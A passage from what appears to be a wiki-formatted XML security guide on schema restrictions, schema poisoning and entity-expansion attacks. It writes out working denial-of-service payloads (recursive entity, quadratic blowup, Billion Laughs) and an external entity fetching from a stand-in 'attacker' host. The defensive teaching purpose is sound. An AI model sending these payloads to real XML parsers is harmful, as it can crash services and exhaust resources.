    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
